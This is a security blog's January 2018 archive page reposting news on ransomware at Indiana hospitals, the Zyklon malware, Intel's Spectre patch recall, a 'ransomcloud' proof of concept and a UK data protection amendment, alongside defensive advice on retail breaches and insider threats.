Sherman's Security Blog
I am Sherman Hand. (also known as Policysup) I have created this blog and will use a part of my day to write about what is going on in the world. I hope to discuss things in a down to earth and practical way. I hope to hear back from you on your thoughts. I do not in any way intend to speak for my employer. The content of this blog will be either opinions that are strictly mine, general observations,re posts, or information that is already in the public domain.

Monthly Archives: January 2018

Intel is recommending that vendors and end users stop deploying the current version of its patch designed to fix the Spectre/Meltdown vulnerabilities that were discovered in most of the company’s processors, along with some from AMD and ARM, and wait for a new patch to be finalized.

The company said it has identified the root cause of the problem in its Broadwell and Haswell processor lines and is in the process of testing an early version of an updated patch to some industry partners, said Navin Shenoy, executive vice president and general manager of the Data Center Group at Intel, in a company blog. When testing is completed a final version will be released.

“We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior,” he wrote.

Another hospital in Indiana has suffered a ransomware attack that affected some of its servers and prevented files from loading correctly.

On 11 January, an employee of Adams Memorial Hospital of Decatur, Indiana notified administrators that some files didn’t look correct. Susan Sefton, a spokesperson for the hospital, said the network went blank before files on the system read “sorry.”

Bitdefender reasons that modification is likely the result of “I’m Sorry,” a type of ransomware discovered in 2017. I’m Sorry appends all files it encrypts on an infected machine with “imsorry.” It then drops a .txt file containing instructions for how the user can pay the ransom in each folder on the infected computer that contains encrypted files.

A screenshot of the I’m Sorry ransom note. (Source: PCrisk)

As a result of the attack, the Berne Outpatient Clinic and three physicians were unable to use the hospital’s network to access patient history or schedule appointments. This unavailability affected between 60 and 80 patients.

Doctors have since regained access to the network, but there’s still the question of whether the attack affected patients’ information. Adams Memorial Hospital doesn’t seem to think so. As it told WANE-TV:

While AHN did experience a business interruption throughout the weekend as we worked to restore the affected severs, there was never an interruption in patient care. We are continuing to assess the severity of the situation, but at this time we believe no patient files have been accessed. At no time during this event has the quality and safety of patient care been affected.

The attack occurred on the same day that Hancock Regional Hospital of Greenfield, Indiana suffered a ransomware attack. That incident ultimately prompted the hospital to pay $50,000 in ransom to those responsible for the infection.

These assaults demonstrate that the risk of a ransomware attack is growing for hospitals. With that said, healthcare organizations more generally need to strengthen their network security measures and take extra care in maintaining the security of their electronic medical record systems.

The malware is designed to recover passwords from popular web browsers, PC gaming software, and email services among other software. The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero, according to a Jan. 17 Trend Micro blog post.

The malware is publically available andhas been observed in the wild since early 2016 providing threat actors sophisticated capabilitiessuch as a full-featured backdoor capable of keylogging, the ability to execute additional plugins like cryptocurrency miners, conduct distributed denial-of-service (DDoS) attacks, self-update and self-removal.

Zyklon is spread via malicious spam attachments in a ZIP file containing a DOC file that exploits at least three known vulnerabilities in Microsoft Office including CVE-2017-8759 and CVE-2017-11882. The malware communicates with its command and control (C2) server over the Onion Router (Tor) network and provides a very efficient mechanism to monitor the malware’s spread and impact.

“What stands out the most to me is that the Zyklon malware is being packaged with pricing tiers based on features,” Chris Morales, Vectra’s head of security analytics, told SC Media.

Threat actors could purchase the normal build of the malware for $75 or the Tor-enabled build for $125 as well as updates for $15 all of which is payable on Bitcoin.

Morales said the malware is a very capable piece of code, yet it exhibits a sequence of common attacker behaviors similar to any other attack with the intent to infect, spy, spread, and steal information and that he has seen many attacks now leveraging TOR for outbound communication and PowerShell for malware updates.

He added that the Windows vulnerabilities used for Zyklon appear to have first been observed in the wild through the detection of another piece of malware, meaning we have no idea how long attackers have known about the vulnerability or when they developed an exploit.

“This is true of every vulnerability ‘discovered and published’ by a threat researcher or security company. Attackers are not keen to publish or share any type of information they already have, and they could sit on this information for a very long time before leveraging an exploit for a vulnerability in a new piece of malware,” Morales said.

Experts agreed. Meni Farjon, co-founder and chief technology officer of SoleBIT Labs, told SC Media the vulnerabilities picked by the threat actors behind the malware are unique as they all share the common characteristic of being 100 percent reliable across almost all Windows versions.

“Normally, code execution exploits combine memory based corruptions, which can lead to unreliable situations on some victims PC’s, and failing to infect,” Farjon said “These vulnerabilities do not corrupt the memory and are almost fully ‘logical.’”

Farjon added that the bugs will even work on a 10 year-old Windows system ensuring extremely high reliability over infections and demonstrates that the actors behind Zyklon are preparing for a massive campaign at one point or another. Lenny Zeltser, vice president of products at Minerva Labs, told SC Media, the approach used in the malware campaign demonstrates some of the ways that adversaries bypass information security defenses and that using Microsoft Office documents together with PowerShell, as well as employing memory injection, is often effective against detection-based anti-malware tools.

“Don’t get me wrong: There is clearly a need for some form of baseline anti-virus protection,” Zeltser said. “However, enterprises should consider ways of augmenting such defenses, for instance by employing technology that makes it harder for the attacker to evade detection.”

Virtual tourism is a little heavy in 2018. Sure, you’ve seen the Minecraft Eiffel Tower and beamed aboard the Minecraft USS Enterprise, but have you considered where you might wait out the end of days? Well, not you exactly, but people more important than you.

To draw attention to the escalating threat of global nuclear annihilation, the Nuclear Threat Initiative (NTI), which works to “prevent catastrophic attacks with weapons of mass destruction and disruption—nuclear, biological, radiological, chemical and cyber,” has partnered with the James Martin Center for Nonproliferation Studies to craft a virtual tour of the nuclear fallout facilities that Russian and/or American leadership will be whisked into in the event of nuclear war.

The team has really outdone itself with the Fallout-esque teaser video.

As NTI explains:

Nothing better illustrates the continuing absurdity of plans to fight a nuclear war than the massive complex of underground bunkers that the United States and Russia have built to survive and fight on even after both societies have collapsed. To help explain the scale of these facilities, we have reconstructed two, Site R in rural Pennsylvania (also known as Raven Rock) and the Kosvinsky underground command facility in Russia, roughly to scale using the popular immersive gaming platform Minecraft.

For anyone with the game, you can fire up a multiplayer instance of Minecraft, select “direct connect” and put in server address 185.38.151.31:25566 to visit Raven Rock, the underground makeshift Pentagon located near Camp David, or 185.38.151.2:25566 to tool around Kosvinsky, “a survivable command post” that serves as Russia’s equivalent. NTI cautions that it only lets zombies out on the weekends.

For anyone without Minecraft, you can take an in-browser virtual tour on NTI’s post about the project, which is also chock full of interesting nuclear bunker facts that put the existence of such underground facilities in an appropriately dark context. The tour is much clunkier outside the game, but the Minecraft experience actually looks pretty cool in that eerie we-definitely-won’t-survive-but-these-people-probably-will way.

If you’re on-board for Amazon’s monthly Prime membership, I’ve got a bit of bad news for you on this cold January morning. The company’s bumping up pricing from $10.99 to $12.99. Not the end of the world, of course, but that comes out to about $156 a year — a $24 increase over the old price.

Amazon has confirmed the price increase with TechCrunch and laid all of this out on its Prime page. It also handily points out if you bite the bullet and pay the $99 yearly fee all up front, pricing will stay the same. In other words, the company would really like to just lock you into that lump sum. The company settled on the yearly pricing back in 2014, when things went up by $20.

The increase will also impact the company’s newly introduced student pricing. That also gets an 18-percent increase, moving from $5.49 to $6.49. Like the standard Prime membership, the yearly fee is staying put at $49.

If you’re already locked into Amazon’s ecosystem, it’s still a good deal with the free shipping and access to Prime Video, Music, et al. For Amazon, it’s been a wildly successful method for becoming a one-stop shop for consumers. And if the company can convince you to opt-in on a per-year basis, all the better.

The fee kicks in today for new members. Existing subscribers will see the increase go into effective on the first renewal payment post-February 18.

At least some of those events likely resulted from retailers’ poor data breach preparation. Consider the fact that just 28 percent of IT security professionals told Tripwire in November 2017 that their organization had a fully tested plan in the event of a breach.

SO WHAT CAN RETAILERS DO TO MAKE SURE THEY DON’T FALL VICTIM TO A DATA BREACH IN 2018?

Added protections like chip & pin, and end-to-end encryption are good improvements for consumers.

Even so, organizations would be wise to step up their defenses in 2018. That’s because malicious actors are constantly developing new methods of attack with which to target retailers. To illustrate, Forrester Research anticipates cyber-criminals will begin developing point-of-sale (POS) ransomware in 2018, making retailers their next lucrative target for extortion-based ransom demands.

Cybercrime shows no signs of slowing down. As a result, retailers would have a lot to gain by going beyond compliance and taking a holistic approach to securing and maintaining the integrity of their systems.

Such measures would help protect them against security incidents and their consequences like negative headlines, angry customers, and hefty fines. Take the European Union’s General Data Protection Regulation (GDPR), for example. Failure to comply with GDPR could be fined up to 4 percent of the annual turnover of the business.

The consequences could even be more serious than legal fees and unflattering press. Following Uber’s most recent data breach disclosure, top Democrats in the United States Senate introduced the Data Security and Breach Notification Act. The legislation would require companies to report data breaches within 30 days. If an individual knowingly conceals a data breach, they could face up to five years in prison under the legislation.

PCI requirements like multi-factor authentication can help companies take steps in the right direction. However, strategic, foundational steps need to be taken to preserve system integrity.

Organizations should think of this as a business journey and not a check-box exercise. Before looking at specific tools or technologies, they should therefore take a look at what foundational steps they need to take to preserve system integrity:

KNOW YOUR ATTACK SURFACE

Organizations should make sure they have visibility into the devices and software they have on their networks. Are there unauthorized devices on the network? Is there unauthorized or unmanaged software throughout the network that brings risk into the environment?

From there, organizations can define their attack surface, or the sum total of points of interaction which could present access to a vulnerability or misconfiguration. An attack surface also covers fully authenticated and authorized connections. Indeed, every interaction to a corporate network presents a certain amount of risk, so it’s important an organization documents each and every connection to understand the corresponding level of risk posed to the business.

MINIMIZE YOUR ATTACK SURFACE

Once organizations know what they have on their networks, they need to make sure that all those devices, applications, and operating systems are configured properly and securely. They should be configured to a defined ideal and secure state following industry best practices and standards as well as internal policies. This is often called “hardening” systems to reduce the attack space.

Due to the number of interactions on most corporate IT environments, it’s unlikely that organizations can reduce their attack surface as an enterprise project. Even so, they can target certain points that amplify benefit. They should also review their vulnerability management program and other tools to determine if those solutions can be configured to provide insight into the attack surface.

MONITOR YOUR ATTACK SURFACE

Once systems are configured and patched appropriately, they should be monitored for any changes and new risks. This includes checking for and fixing vulnerabilities, making sure secure configurations are maintained, managing administrative privileges, and paying attention to log data. Keeping track of administrative privileges and log activity will also help identify and investigate suspicious activity.

Organizations should then take this information and track it overtime. Whatever trends result from that process can eventually help them make business decisions that reduce risk. For guidance on how to communicate those trends to decision-makers at your company, click here.

GOING BEYOND THE CHECK-BOX…

Major data breaches happen because of a simple misconfiguration issue or failure to patch a known vulnerability. With that said, strong system integrity and adequate security posture must be built strategically and holistically, not through a check-box exercise. Only then can organizations effectively comply with PCI and GDPR and most importantly manage their risk against serious data breaches and cyber incidents.

Interested in learning about the latest processes and technologies used to protect payment and personal data? Consider attending the 16th PCI London event. You can learn more about the event here.

Proposed amendments to the United Kingdom’s Data Protection Bill would help protect security researchers working with anonymized data.

Introduced by Lord Ashton of Hyde, Parliamentary Under-Secretary of State at the Department for Culture, Media and Sport, the draft changes (PDF) address Clause 162 of the third generation of data protection law that has entered the UK Parliament thus far.

This particular article makes it “an offence for a person [to] knowingly or recklessly to re-identify information that is de-identified personal data without the consent of the controller responsible for de-identifying the personal data.” In other words, a security researcher could potentially face criminal charges for proving that anonymized information can be manipulated in such a way that the subjects to which the data pertains can once again be attributed.

The Data Protection Bill as currently written (PDF) does outline certain “defenses” under which a person could justify their decision to re-identify. Those items include obtaining the consent of either the data subject or controller as well as proving that re-identification served the public interest.

Lord Ashton of Hyde’s changes add on to those possible exceptions with the introduction of “effectiveness testing conditions.” To meet those qualifications, a person would need to have acted with a view of testing the effectiveness of the de-identification measures in the aim of serving the public interest and not causing harm. That person would also need to have notified either the Commissioner or the controller(s) responsible for de-identifying the data about their re-identification within a period of less than 72 hours if possible.

A screenshot of one of some of Lord Ashton of Hyde’s proposed changes to the Data Protection Bill.

Privacy researcher Lukasz Olejnik feels that the changes are a step in the right direction. As he told The Register:

“GDPR is intended as a pro-consumer data privacy regulations. It was surprising that UK’s Data Protection Bill proposals’ contained clauses that potentially could later become misused to target security and privacy researchers…. [The proposed changes] contain some reasonable compromises. Although such research is still regulated, researchers acting in the public interest will have less to worry if they disclose vulnerabilities to Information Commissioner’s Office.”

The Data Protection Bill is separate from the EU GDPR. Yet as the Information Commissioner’s Office notes, the Bill helps specify how the Regulation applies to individual states like the United Kingdom. The ICO therefore feels “[i]t is therefore important the GDPR and the Bill are read side by side.”

In 2017, some of the world’s most devastating cyber attacks were seen. Insider threats continue to be the primary reason for such high profile data breaches year over year.

With the rise of malware as a service, insiders are now more than capable of sabotaging a company’s operations or stealing data to sell on the darknet. Without the right support from management, preventing severe data breaches can become near impossible. Malicious insiders paired with increasingly dangerous malware means that management needs to be actively involved in security.

It is common for management to assume that cyber security is a matter best handled by the IT department or the internal cyber security team. However, this is far from what good cyber security practice means today. Much of this illusion is due to the inherent technical nature of cyber security; the other aspects of people and processes are not emphasized as much.

This article specifically focuses on best management practices to improve the people and process side of cyber security. Let us discuss how organizations of any size can take measures to ensure that their cyber security is top of the line.

DIGITAL ASSET IDENTIFICATION

The operational definition that we use for asset comes from the ISO 55000.

According to the ISO standard, an asset is something with current or potential value to an organization, and is under their responsibility.

While the ISO 55000 is focused on physical asset management, this definition also applies to digital assets as well, including data. What makes a “critical asset” goes beyond value; rather, a critical asset could severely damage the ability of an organization to continue operations if the asset is ever degraded in any way.

Data is one of the single most important assets for any organization in today’s world.

However, not all data is equal in business. Every business is responsible for the data of their customers, partnerships, inventory, vendors, and their own operations. Data that flows through an organization usually includes financial data of the company, operations data, personal identifiable data of customers, and at times classified data.

The first step to helping with data breach prevention is to identify and categorize data. While IT has insight into how your information systems are running, they do not have full insight into the operations and processes of the business as a whole. As a manager, this is where you come to their aid.

When categorizing data, typically they fall into the following groups: public, internal, classified, and regulation required. It is important to label which types of data are associated with each process in your organization. Cyber criminals often do not try to target all categories of data. At times, it could be only internal data they seek; other times, it could be internal, classified, or regulation required. Often, cyber criminals and insiders have very specific data they are attempting to acquire.

INSIDER THREAT PROGRAM

Insider threats are a very unique security issue that each organization faces. They thus require specialized resources for addressing the problem.

This is where an insider threat program comes in. An insider threat program is an organization-wide program that features a unified vision and mission, roles, duties, and specialized training. Insider threat programs should ideally include HR, legal, IT, engineering, data owners, and department directors. Above all, the program should include only the most trusted individuals in the organization.

Insider threat programs work to establish a source of relevant information, set of protocols, and mechanisms to detect, prevent, and respond to insider threats. Included in the insider threat program should be: mission, detailed budget, governance structure, and a shared platform.

Those are just for the formation; the work of the insider threat program should include:

Compliance and Process Oversight Board: This group exists to review as-is work processes for the organization and recommends changes to prevent insider threats before a data breach occurs.

Reporting Mechanisms: Office politics, clique behavior, and a host of other factors can prevent an employee from reporting suspicious behavior. This is why reporting mechanisms of suspicious insiders need to be made confidential to prevent any retaliatory action against whistleblowers.

Incident Response Plan: So you’ve identified an insider threat, and you may even have proof of a data breach from them. Do you just fire them and report them to authorities? These questions and more clearly answered as you develop an insider incident response plan. These plans explain step by step how alerts are identified, managed, and escalated. With those details, you will also need to include time frames for every action and procedure.

Specialized Training: The insider threat training details an awareness and training program for all personnel in the organization. However, people directly involved in the Insider Threat Program will receive even more specialized training to better detect and mitigate insider threats.

Infrastructure: This component is straightforward; it is simply infrastructure to detect, prevent, and respond to insider threats. The technology that supports management’s effort to achieve its mission. The technology deployed should be reviewed regularly for the most optimal alternatives.

There are in total about thirteen components to a typical insider threat program. The other ones not listed include: civil liberty protections, communication framework, insider threat program supporting policies, data collection tools, vendor management, and risk management integration.

SECURITY VETTING AND MONITORING (HR)

When hiring personnel, one of the preemptive moves you can do to secure your organization is to perform a background check on the candidate. While organizations often perform these checks for cost-reduction purposes, in the context of cyber security, the hiring process is the beginning with personnel.

Some things to look out for are a criminal history and truth about employment. Malicious insiders, who can at times be spies, can make their way into your organization by presenting themselves as the perfect candidate.

The higher the risk level, the more trust and security prerequisites required to work that position. When a new hire comes into a position with a higher risk, they should be monitored more closely by supervisors for high risk behavior. Additionally, any incidents should be documented and analyzed for behavior trends. Behavior analytics and risk profiling technology can be a great aid in this process.

HR should also have a termination protocol prepared for when it is time to let an employee go.

The protocol should require managers to conduct an exit interview, provide final performance appraisal, and discuss final paycheck arrangements. IT should delete all of the departing employee’s accounts.

If they are a privileged user, then IT needs to change all shared passwords. HR needs to make clear once again any intellectual property agreements to the departing employee.

HEALTHY WORK CULTURE AND MINIMIZED STRESS

Often, productivity is chosen; it could mean meeting goals that would drive anyone to high stress levels. When people are stressed, all sorts of negative things start happening, such as more mistakes, ill will towards one another, and a feeling of being ignored.

These are just a few, but even in these few, you have the perfect conditions for both negligent and malicious insider threats to flourish. To avoid these conditions, it helps to understand what are the most pressing challenges to developing a healthy work culture.

One challenge was mentioned above: managing productivity and stress levels. Other challenges include baselining employee productivity and understanding the costs and benefits of reducing stress. Identifying how these challenges apply to your organization will help you understand some operational process improvements that can be made.

Reducing stress may mean a new management style needs to be implemented, such as project-oriented task management. Another method of reducing stress may be to understand how you’re measuring success, key performance indicators (KPI), and how those are contributing to work culture.

An example of harmful KPIs would be if a call center was measuring phone calls made as their KPI rather than customers landed. By measuring phone calls made, the quantity of phone calls forces employees to meet a certain goal that could contribute to poor customer service, unnecessary competitiveness, and increased mistakes.

Simply changing the KPI to customers landed also changes where the pressure is for employees. Now employees can have more meaningful interactions with customers and will be more likely to take care to ensure there are fewer mistakes.

The core take away from this example is to use KPIs that align with your context. Encourage thought before action. For your organization, try to identify the root cause of issues in work culture and then work to fix it.

VENDOR MANAGEMENT PROGRAM & POLICIES

While you are working to ensure your organization is secure from insider threats from employees, your vendors and business partners may not have been so diligent.

It is for this reason that you need a vendor management program. Vendor management programs are a series of protocols that are designed for accountability and monitoring between your organization and the vendors you work with. Vendor management programs are a responsibility of management. IT can only do so much, and if management is not setting some standards prior to vendor engagement, then IT will have to dedicate limited resources to mitigating vulnerabilities.

These programs are defined by a four phases: definition, specification, controls, and integration.

The definition phase of a vendor management program involves identifying the most mission-critical vendors to your organization. Mission critical in this context means vendors that you rely on to be successful and that any relationship issue could have a negative impact on operations and revenues.

The next phase, specification, is concerned with appointing a security liaison for each vendor you work with. The responsibilities of this liaison are to maintain compliance knowledge, perform audits, facilitate security communications, provide training, track contracts and all documentation, and impose general oversight.

Once those two phases are covered, then comes the heavy lifting for management, the development of vendor policy and controls.

When drafting vendor policy, the document should include the right to audit security controls, requirement for vendor compliance with monitoring, security performance reporting, and timely notification of any data breach.

By developing these policies, the security liaison will have a strong base to work with to perform their duties. However, the success of the liason is very dependent on what management requires of vendors and sets as controls in this phase.

The final phase is integration, which is primarily concerned with data collection, analysis, and validation.

Information about your supply chain should be accessible to you. Without that data, you will be unable to understand your full security position. The information collected needs to be integrated with your organization’s existing security practices and auditing procedures. Without full integration, the vendor management program becomes a side activity, which is not how you want to handle cyber security.

MANAGEMENT’S CRITICAL ROLE

Preventing insider threats is not the job of IT alone. Only with the dedicated support of management can a business best prevent insider threats.

The recommendations above are just a few ways in which management help prevent insider threats. Leadership in an organization impacts process development, hiring practices, business relationships, and work culture.

If either one of those areas creates vulnerabilities, then the business will remain at high risk for an insider-related data breach. Managers can stay alert by following the CERT Insider Threat Center to find more resources.

KnowBe4’s Chief Hacking Officer Kevin Mitnick called me with some chilling news. A white hat hacker friend of his developed a working “ransomcloud” strain, which encrypts cloud email accounts like Office 365 in real-time . My first thought was: “Holy $#!+”.

I asked him: “Can you show it to me?”, and Kevin sent me a video demo, you can see it below. Lucky for us, this type of ransomware strain is not in the wild at the moment.

When I started looking into it, the proof of concept that he mentions in the video has been around for a while, but it’s on the horizon, because if a white hat can do this, so can a black hat. I am wondering why they haven’t already, because it’s not all that hard to do.

This strain uses a smart social engineering tactic to trick the user to give the bad guys access to their cloud email account, with the ruse of a “new Microsoft anti-spam service”.

Once your employee clicks “accept” to use this service, it’s game over: all email and attachments are encrypted real-time! The ransomcloud attack will work for any cloud email provider that allows an application giving control over the email via oauth. With Google it will work if you get the app past their verification process. Outlook365 doesn’t verify the app at this point so its much easier.

See it for realz here (video is just 5 minutes) and shiver:

What Kevin recommends at the end of this video: “Stop, Look and Think before you click on any link in an email that could potentially give the bad guys access to your data.” is now more true than ever.

If you are a KnowBe4 customer and use either Gmail or O365, I recommend sending the special phishing template we created for this called “Microsoft AntiSpamPro Ransomcloud” and it lives in the “Phishing for Sensitive Information” category.

What Percentage Of Your Users Would Click On That Link?

Organizations are moving millions of users to O365. However, this video proves that being in the cloud does not automatically mean you are secure. The Phish-prone percentage of your users is your number one vulnerability, as they remain to be the weakest link in your IT security, cloud or not.

A hospital shut down its network after a ransomware attack restricted authorized personnel access to some of its computer systems.

On 12 January, Hancock Regional Hospital confirmed in a statement that it had suffered a ransomware attack. As quoted by FOX59:

Hancock Regional Hospital has been the victim of a criminal act by an unknown party that attempted to shut down out operations via our information systems by locking our computer network and demanding payment for a digital key to unlock it. Unfortunately this sort of behavior is widespread in the world today, and we had the misfortune to be next on the list. We are working closely with an IT incident response company and national law enforcement. At this time, we are deep into the analysis of the situation and see no indication that patient records have been removed from our network. In addition to excellent performance by our IT Department, our clinical teams have performed exceptionally well, and patient care has not been compromised. Our doors are open at Hancock Regional Hospital.

The Daily Reporterwrites that the trouble first started on 11 January when staff noticed the network was running much slower than usual. Not long thereafter, a message appeared on at least one hospital-owned computer’s screen stating that authorized personnel wouldn’t be able to access parts of the Greenfield-based healthcare provider’s systems until it paid a ransom in Bitcoin. The amount of that ransom demand isn’t known at this time.

Hancock Regional’s IT team decided to immediately suspend the hospital’s network while it works with the FBI and a “national IT security company” to determine what happened and how it should respond. Hancock Health CEO Steve Long said the ransomware attack didn’t originate from a malicious email but declined to provide additional comments about its delivery vector.

Long did say, however, that the ransomware didn’t significantly affect patient care. The hospital posted a notice at its entrances on 12 January informing patients of a “system-wide outage.” Even so, doctors and nurses were able to update patients’ medical records using pen and paper and to fulfill most of the scheduled appointments that weren’t cancelled due to inclement weather.

Rob Matt, the hospital’s chief strategy officer, told IndyStar that the hack affected the Hancock Regional’s electronic health records, among other systems, but that it had not exposed patients’ information:

What we do know is that no patient information has been affected, so at this point, there’s no understanding of any consequence other than our system is being held. We, like other hospitals, do disaster drills all the time, so this aligns perfectly well with drills that we’ve had throughout the years on how to continue to deliver world-class care when you have system failures or system breaches.

Unfortunately, Hancock Regional isn’t the first hospital to suffer a ransomware attack. Hollywood Presbyterian Medical Center made headlines in February 2016 when the southern California medical center paid $17,000 for the restoration of its systems following a ransomware attack. More than a year later, the May 2017 global outbreak of WannaCry ransomware affected 34% of National Health Service (NHS) trusts in England.

Attackers will continue to target hospitals with ransomware going forward. With that said, it’s important that healthcare providers everywhere protect their systems against crypto-malware and other digital threats. To learn how Tripwire’s solutions can help in this regard, click here.